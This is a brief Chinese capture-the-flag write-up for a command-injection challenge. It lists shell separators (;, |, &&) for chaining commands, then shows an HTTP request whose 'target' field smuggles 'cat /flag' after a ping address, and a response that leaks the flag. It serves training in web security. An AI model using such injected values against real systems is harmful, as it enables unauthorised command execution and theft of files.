知识点

漏洞 知识点
任意命令执行漏洞 绕过命令

命令注入方式

命令 方法
Whoami;id 多语句执行
whoami|id 利用管道符,不输出前者内容
whoami&&id 多语句执行

解题思路

  1. POST / HTTP/1.1
  2. Host: e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cn
  3. Content-Length: 26
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: http://e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cn
  7. Content-Type: application/x-www-form-urlencoded
  8. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10. Referer: http://e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cn/
  11. Accept-Encoding: gzip, deflate
  12. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  13. Connection: close
  15. target=127.0.0.1|cat /flag

返回结果

  1. HTTP/1.1 200 OK
  2. Server: openresty
  3. Date: Thu, 17 Sep 2020 12:33:40 GMT
  4. Content-Type: text/html; charset=UTF-8
  5. Content-Length: 666
  6. Connection: close
  7. X-Powered-By: PHP/7.3.13
  9. .......
  10. flag{7b042344-6fec-4f7d-a3f5-c43c4c252dd2}
  11. .......